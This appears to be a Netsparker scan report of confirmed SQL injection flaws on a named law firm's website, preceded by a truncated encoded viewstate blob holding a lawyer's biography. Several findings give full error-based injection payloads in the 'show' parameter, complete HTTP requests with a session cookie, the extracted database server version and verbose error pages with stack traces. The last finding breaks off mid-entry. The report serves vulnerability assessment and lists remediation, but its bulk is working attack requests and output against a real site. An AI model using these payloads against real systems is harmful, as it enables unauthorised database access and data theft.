ggYSBjdXJyZW50IGVtcGhhc2lzIG9uIGxpZmUgYW5kIGRpc2FiaWxpdHkgY2FycmllciBsaXRpZ2F0aW9uLlw8L3BcPg0KXDxwXD5Nci4gR2xhc2hlZW4gaGFzIHJlcHJlc2VudGVkIGluc3VyYW5jZSBjbGllbnRzIGZvciAyMCB5ZWFycy4gVGhpcyBleHBlcmllbmNlIGluY2x1ZGVzIGNvbnRyYWN0dWFsIGRpc3B1dGVzIGFuZCBjbGFpbXMgZGVjaXNpb25zLCBib3RoIHVuZGVyIEVSSVNBIGFuZCBpbmRpdmlkdWFsIHBvbGljaWVzXDsgc2FsZXMgcHJhY3RpY2VzIGxpdGlnYXRpb25cOyBtdWx0aS1kaXN0cmljdCBsaXRpZ2F0aW9uXDsgaW50ZXJwbGVhZGVyc1w7IHBvbGljeSByZXNjaXNzaW9uc1w7IGJyZWFjaCBvZiBub24tcG9saWN5IGNvbnRyYWN0cywgY2xhaW1zIGZvciBleHRyYS1jb250cmFjdHVhbCwgc3RhdHV0b3J5LCBiYWQgZmFpdGggYW5kIHB1bml0aXZlIGRhbWFnZXMsIGFuZCBGSU5SQSBhcmJpdHJhdGlvbnMuXDwvcFw+DQpcPHBcPkluIGEgcmVjZW50IHJlcHJlc2VudGF0aW9uLCBNci4gR2xhc2hlZW4gcmVwcmVzZW50ZWQgYW4gaW5zdXJlciBhbGxlZ2luZyB0aGF0IG9uZSBvZiBpdHMgYnJva2VycyBpbXByb3Blcmx5IGRlbGl2ZXJlZCBhIGxpZmUgaW5zdXJhbmNlIHBvbGljeS4gVGhlIHR3by13ZWVrIHRyaWFsIHJlc3VsdGVkIGluIGEgJDEuMiBtaWxsaW9uIGp1cnkgdmVyZGljdCBpbiBmYXZvciBvZiB0aGUgaW5zdXJlci5cPC9wXD4NClw8cFw+SW4gYSBzZWNvbmQgcmVwcmVzZW50YXRpb24sIE1yLiBHbGFzaGVlbiAtLSBpbiBhIGNhc2Ugb2YgYXBwYXJlbnQgZmlyc3QgaW1wcmVzc2lvbiAtLSBzdWNjZXNzZnVsbHkgZGVmZW5kZWQgYW4gaW5zdXJlciBhZ2FpbnN0IGF0dGVtcHRzIGJ5IGZhbWlseSBtZW1iZXJzIHRvIHVzZSBhICJjYXRhc3Ryb3BoaWMgZXZlbnRzIiBzdGF0dXRlIGVuYWN0ZWQgaW4gTmV3IEplcnNleSBpbiByZXNwb25zZSB0byB0aGUgZXZlbnRzIG9mIDkvMTEgdG8gc2VlayBhbiBlYXJseSBkZWNsYXJhdGlvbiBvZiBkZWF0aCB3aGVyZSB0aGUgaW5zdXJlZCBoYWQgZGlzYXBwZWFyZWQgd2hpbGUgaW4gdGhlIHZpY2luaXR5IG9mIGEgaHVycmljYW5lIGluIEZsb3JpZGEuXDwvcFw+DQpcPHBcPkluIGFub3RoZXIgcmVwcmVzZW50YXRpb24sIE1yLiBHbGFzaGVlbiBwZXJzdWFkZWQgdGhlIERpc3RyaWN0IENvdXJ0IHRoYXQgYSBub24tbWVtYmVyIG9mIHRoZSBOYXRpb25hbCBBc3NvY2lhdGlvbiBvZiBTZWN1cml0aWVzIERlYWxlcnMgY291bGQgZWl0aGVyIGNvbXBlbCBhIE5BU0QgYXJiaXRyYXRpb24gb3IgcGFydGljaXBhdGUgaW4gYSBOQVNEIGFyYml0cmF0aW9uIHRoYXQgaGFkIGJlZW4gY29tbWVuY2VkIGJ5IGEgc3Vic2lkaWFyeSwgTkFTRCBtZW1iZXIgY29tcGFueS4gQXMgcGFydCBvZiB0aGUgbGl0aWdhdGlvbiwgYW4gZW1lcmdlbmN5IG9yZGVyIHdhcyBvYnRhaW5lZCBmcm9tIHRoZSBVbml0ZWQgU3RhdGVzIENvdXJ0IG9mIEFwcGVhbHMgZm9yIHRoZSBUaGlyZCBDaXJjdWl0IHByZWNsdWRpbmcgbWVyaXRzIGRpc2NvdmVyeSB3aGlsZSB0aGUgQ291cnQgY29uc2lkZXJlZCB0aGUgYXJiaXRyYWJpbGl0eSBhbmQgZm9ydW0gaXNzdWVzLiBUaGUgcmVzdWx0IHdhcyB0aGF0IHRoZSBDb3VydCBncmFudGVkIHRoZSBDb21wYW55J3MgTW90aW9uIHRvIENvbXBlbCBBcmJpdHJhdGlvbiBhbmQgdG8gU3RheS4mbmJzcFw7IFRoZSBhcmJpdHJhdGlvbiBpdHNlbGYsIHBlcnRhaW5pbmcgdG8gY2xhaW1zIGJ5IHJlZ2lzdGVyZWQgcmVwcmVzZW50YXRpdmVzIGZvciBkZWZhbWF0aW9uLCB3cm9uZ2Z1bCBkaXNjaGFyZ2UsIGludGVudGlvbmFsIGludGVyZmVyZW5jZSB3aXRoIGVjb25vbWljIHJlbGF0aW9ucywgZnJhdWQsIGFuZCBvdGhlciB0b3J0cyAtLSBzZWVraW5nICQ1IG1pbGxpb24gaW4gY29tcGVuc2F0b3J5IGRhbWFnZXMgcGx1cyBwdW5pdGl2ZSBkYW1hZ2VzIC0tIHdhcyBzdWNjZXNzZnVsbHkgY29uY2x1ZGVkLiZuYnNwXDsgVGhlIHRyaWFsIGxhc3RlZCB0aHJlZSB3ZWVrcy5cPC9wXD4NClw8ZGl2XD5JbiBhbm90aGVyIHJlY2VudCBtYXR0ZXIsIE1yLiBHbGFzaGVlbiBvYnRhaW5lZCBzdW1tYXJ5IGp1ZGdtZW50IGluIGZhdm9yIG9mIGFuIGluc3VyZXIgaW4gZmVkZXJhbCBkaXN0cmljdCBjb3VydC4mbmJzcFw7UGxhaW50aWZmIGFzc2VydGVkIGNsYWltcyBmb3IgYnJlYWNoIG9mIGNvbnRyYWN0IGFuZCB0b3J0aW91cyBjb25kdWN0IGFzIGEgcmVzdWx0IG9mIHRoZSBDb21wYW55J3MgcGF5bWVudCBvZiAkMSBtaWxsaW9uIGluIGRlYXRoIGJlbmVmaXRzIHRvIGhpcyBzaXN0ZXIsIHJhdGhlciB0aGFuIHBheWluZyA1MCUgb2YgdGhlIGJlbmVmaXQgdG8gaGltLiBDb250cmFjdCwgc3RhdHV0b3J5LCBhbmQgcHVuaXRpdmUgZGFtYWdlcywgYmFzZWQgb24gYmFkIGZhaXRoLCB3ZXJlIHNvdWdodC4gVGhlIGluc3VyZXIgYXNzZXJ0ZWQgdGhhdCB0aGUgc2lzdGVyJ3Mgc2lnbmF0dXJlcyBvbiBmb3JtcyBwdXJwb3J0ZWRseSBnaXZpbmcgaGVyIGJyb3RoZXIgYW4gaW50ZXJlc3QgaW4gdGhlIHBvbGljeSBoYWQgYmVlbiBmb3JnZWQgYW5kIHdlcmUgaW5lZmZlY3RpdmUuIFRoZSBDb3VydCBhZ3JlZWQgd2l0aCB0aGUgaW5zdXJlcidzIHBvc2l0aW9uIHRoYXQgdGhlIHNpc3RlcidzIHNpZ25hdHVyZXMgd2VyZSBmb3JnZWQgYW5kIHRoYXQgcGxhaW50aWZmJ3MgZWZmb3J0cyB0byBjaGFsbGVuZ2UgdGhlIGF1dGhlbnRpY2l0eSBvZiB0aGUgc2lzdGVyJ3Mgc2lnbmF0dXJlcyBkaWQgbm90IHJhaXNlIGEgZ2VudWluZSBpc3N1ZSBvZiBtYXRlcmlhbCBmYWN0Llw8L2Rpdlw+DQpcPGRpdlw+XDwvZGl2XD4NClw8cFw+TXIuIEdsYXNoZWVuIGlzIGFsc28gZXhwZXJpZW5jZWQgaW4gbXVsdGlwbGUgYXJlYXMgb2YgY29tbWVyY2lhbCBsaXRpZ2F0aW9uLCBpbmNsdWRpbmcgYnJlYWNoIG9mIGNvbnRyYWN0LCBidXNpbmVzcyB0b3J0cywgcGFydG5lcnNoaXAgYW5kIGNvcnBvcmF0ZSBkaXNwdXRlcywgYW5kIHByb3NlY3V0aW9uIGFuZCBkZWZlbnNlIG9mIGluanVuY3Rpb25zLlw8L3BcPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGJyXD5cPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPkVEVUNBVElPTlw8L2JcPlw8L3NwYW5cPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+Si5ELiwgR2VvcmdldG93biBVbml2ZXJzaXR5IExhdyBDZW50ZXIsIDE5NzNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuQS4sIExlaGlnaCBVbml2ZXJzaXR5LCBcPGlcPlw8aVw+Y3VtIGxhdWRlXDwvaVw+XDwvaVw+LCAxOTY3Oz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8ZGl2IHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5cPEJSXD5BRE1JU1NJT05TXDxCUlw+XDxCUlw+XDwvQlw+XDwvZGl2XD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPg0KU3VwcmVtZSBDb3VydCBvZiBQZW5uc3lsdmFuaWFcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRWFzdGVybiwgTWlkZGxlLCBhbmQgV2VzdGVybiBEaXN0cmljdHMgb2YgUGVubnN5bHZhbmlhXDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD4NClUuUy4gQ291cnQgb2YgQXBwZWFscywgVGhpcmQgQ2lyY3VpdFw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpNdWx0aXBsZSBQcm8gSGFjIFZpY2UgYWRtaXNzaW9ucyBpbiZuYnNwXDtvdGhlciBqdXJpc2RpY3Rpb25zXDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD5cPC9mb29cPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw+XDxCUlw+TUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw+XDxCUlw+XDwvQlw+XDwvZGl2XD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPiANCkFzc29jaWF0aW9uIG9mIExpZmUgSW5zdXJhbmNlIENvdW5zZWxcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KSW50ZXJuYXRpb25hbCBDbGFpbXMgQXNzb2NpYXRpb24sIE1lbWJlciBMYXcgQ29tbWl0dGVlXDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD4NCkFtZXJpY2FuIEJhciBBc3NvY2lhdGlvbiwgU2VjdGlvbiBvbiBMaXRpZ2F0aW9uXDsgU2VjdGlvbiBvbiBUb3J0LCBUcmlhbCBhbmQgSW5zdXJhbmNlIFByYWN0aWNlIChmb3JtZXIgQ2hhaXIgb2YgTGlmZSBJbnN1cmFuY2UgTGF3IENvbW1pdHRlZSlcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KXDxzcGFuXD5QaGlsYWRlbHBoaWEgQmFyIEFzc29jaWF0aW9uXDwvc3Bhblw+XDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD4NClw8c3Bhblw+TGVoaWdoIExhd3llcnMgQXNzb2NpYXRpb24sIEZvdW5kaW5nIERpcmVjdG9yIGFuZCZuYnNwXDtGaXJzdCBQcmVzaWRlbnRcPC9zcGFuXD5cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8L2Zvb1w+Oz4+Ozs+Oz4+Oz4+Oz4+Oz6v++pXyxDS9HvpDKHnHWvOrczxiA==" />

<table id="pageTable" width="100%" height="100%" cellSpacing="0" cellPadding="0" align="right"
bgColor="#ffffff" border="0">
<tr>
<td width="100%" align="center" valign=top>
<!--Begin content cell-->

<table width="100%" cellpadding="0" cellspacing="0">
<!--DWLayoutTable-->
<tr>
<!--<td colspan="2" valign="top">
<br>
<table width="100%" cellpadding="0" cellspacing="0">
<tr>
<td width="14%">&a..
SQL Injection

SQL Injection

7 TOTAL
CRITICAL
CONFIRMED
7
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR..

Parameters

Parameter Type Value
show GET (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

GET /new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
PrintPage GET True
Show GET (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
sortby GET 3
by GET 3
title GET 3
related GET 3

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

GET /new/showlocationnew.aspx?PrintPage=True&Show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showbionew.aspx

/new/showbionew.aspx CONFIRMED

http://www.mccarter.com/new/showbionew.aspx?show='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCH..

Parameters

Parameter Type Value
show GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Related GET 3

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

GET /new/showbionew.aspx?show='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&Show=1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:39:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4166


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showbionew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showbionew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR..

Parameters

Parameter Type Value
show GET (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
